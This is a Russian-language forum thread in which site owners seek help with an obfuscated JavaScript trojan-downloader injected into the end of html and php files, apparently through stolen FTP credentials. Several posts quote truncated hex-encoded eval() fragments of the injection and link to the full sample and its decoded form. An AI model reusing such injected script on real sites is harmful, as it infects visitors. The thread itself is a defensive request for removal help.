ААААААААААААААААААААААААаа люди помогите!!! Что за вирус, кидаю файлы по ftp на хост и к ним прикрепляется вирус в конец такого типа: <!-- [ 4455e927ffa4408f4d13cbdc18c9a79d ] --><script>eval('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x61\x6e\x6d\x63\x64\x28\x69\x64\x62\x5a\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x35\x35...
Х/З я сталкивался с этой ***ней когда работал на студии дизайна, пол года ебались с этим вирусом и систему сносили и по 3 антивиря они ставили - так и не хуя!!! Люди добрые помогите! Что делать? Прикрепляется в конец файлов html и php вирус на JS HELP SOS HELP Пол года с ними не работаю, а тут попросили зайти на хостинг их, посмотреть проблемму, как раз этот сайт и был инфицирован, я зашел, вышел, после чего на следующий день узнаю, что у меня на другом хосте, на Агаве такой же хлопец сидит! Вот подонки то. HELP !!!
Дай полный код который прикрепляется к файлам . Скорее всего у тебя JS\Xorer - Заражает JS файлы и не только .
HTML: <!-- [ 4455e927ffa4408f4d13cbdc18c9a79d ] --> <script> eval('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x61\x31\x66\x25\x37\x66\x25\x35\x31\x31... Всего кода не сохранил P.S. кто там так жестко ачат то ддосит, что даже сообщение незапостить!?
Напиши полный код. Конечно это не выход, но на время пока будешь искать источник заразы в конце страниц добавляй просто <noscript>
так и сделаю пока! Уже мысли были, нужно как то избавится эт этого дерьмя приципного. Тема актуальная, не в первый раз уже сталкиваюсь.
вот он, только конца нету, как появится я выложу весь кусок, он везде одинаково выглядит http://slil.ru/25893254
блин , 3 часа не мог зайти на ачат . Декодировал кусок этой шняги , каспер декодированный код запалил как Trojan-Downloader.Inor.a . Результат проверки : http://www.virustotal.com/ru/analisis/12eb3d3937c85294c7d0db1852e02228 декодированный код : http://www.rapidshare.ru/702502
http://pastebin.org/43896 после расшифровки первой функции. во второй поставил алерт, можно запустить) http://pastebin.org/43898 потом получается это. но в конце строка для дешифровки остается неполной. хз почему
Блин, NOD его не видит, делал глубокий анализ системы, как заразу выдавить? Выходил по ftp, просмотрел файлы в корневой дириктории - всё чисто. Кстати, на инфицированный сайт, я выходил через Cut Ftp , как вирь мог передаться с этого сайта на тот, с которым я занимаюсь сейчас? Хостинг у них разный, и выходил я на второй сайт через Total Commander ??? Получается моя система заражена этой дрянью HELP !!!
была такая же проблема, сайт хостился на mtw.ru(не сочтите за рекламу), думал, что на сайте чей-нить шелл лежит. Когда написал в службу поддержки - посоветовали сменить пароль на фтп и проверить на вирусы все компы, с которых возможен доступ по фтп. Так и сделал, проблема исчезла. З.Ы. проверял Dr.Web'ом
Пол года чистили тримя антивирусами и звонили на хост каждый день + винду меняли - проблемма решена не была! У меня вроде бы всё нормально пока.
Aaaaaaaaaaaaaa Help Me Pleas!!! Aaaaaaaaaaaaaa Help Me Pleas!!! Опять сЦука прицепилась в конец index.php !!! На этот раз я её зацепил от начала и до конца! Выкладываю: http://slil.ru/25913635 http://ifolder.ru/7042045 http://rapidshare.com/files/123665937/virus_help_.rar http://depositfiles.com/files/6091668 Вот как он выглядит (вырезал середину): HTML: <!-- [ 4455e927ffa4408f4d13cbdc18c9a79d ] --><script>eval('\x66\x75\x6e\x63\x74\x69\x6f\ ... x37\x64\x27\x29\x3b');</script><!-- end --> Virus total: http://www.virustotal.com/ru/analisis/72853bf175278709c277c35a2919353f Что делать? Как выдавить эту мразь? HELP ME!!!